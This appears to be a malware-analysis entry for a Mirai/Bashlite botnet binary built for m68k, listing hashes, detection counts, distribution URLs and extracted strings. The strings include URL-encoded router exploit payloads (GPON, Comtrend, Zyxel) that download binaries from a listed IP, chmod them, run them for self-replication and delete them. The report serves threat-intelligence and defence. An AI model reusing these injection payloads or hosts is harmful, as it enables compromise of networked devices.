c.m68k

First submission 2024-09-05 01:06:02 Last sumbission 2024-09-05 01:13:02

File details

File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 135.08 KB (138320 bytes)
MD5: ddc1b960e6e8514934f4e1fc488d64d9
SHA1: 2b0c80c57b04956c0d3916cc8cc5e1a010f9cc81
SHA256: 65b126e31c5d791273b6f2f9dc78fdb0fbb93793d64ca4ab5ffafd5c14c61d49

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 38/79 VT report date: 2024-09-05 00:48:15
Malware Type 1 trojan
Threat Type 3 mirai bashlite expl

URLs, FQDN and IP indicators 2

URL Host (FQDN/IP) Date Added
hXXp://ydl-v2.mhdy.site/c.m68k VirusTotal Report ydl-v2.mhdy.site VirusTotal Report 2024-09-05 01:13:05
hXXp://5.59.248.92/c.m68k VirusTotal Report 5.59.248.92 VirusTotal Report 2024-09-05 01:06:02

Strings analysis - Possible IPs found 3

5.59.248.92
127.0.0.1
192.168.0.100

Strings analysis - Possible URLs found 13

http://5.59.248.92/Yboats.mips
http://5.59.248.92/Yboats.mips;
http://5.59.248.92/gpon443+-O+/tmp/gaf;sh+/tmp/gaf
http://5.59.248.92/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
http://5.59.248.92/Yboats.mpsl;chmod
http://5.59.248.92/adb;
http://5.59.248.92/Yboats.arm7;chmod+777+Yboats.arm7;./Yboats.arm7+zyxel.selfrep;rm+-rf+Yboats.arm7%3b%23&remoteSubmit=Save
http://schemas.xmlsoap.org/soap/envelope/
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2001/XMLSchema-instance
http://schemas.xmlsoap.org/soap/encoding/
http://5.59.248.92/Yboats.x86
http://purenetworks.com/HNAP1/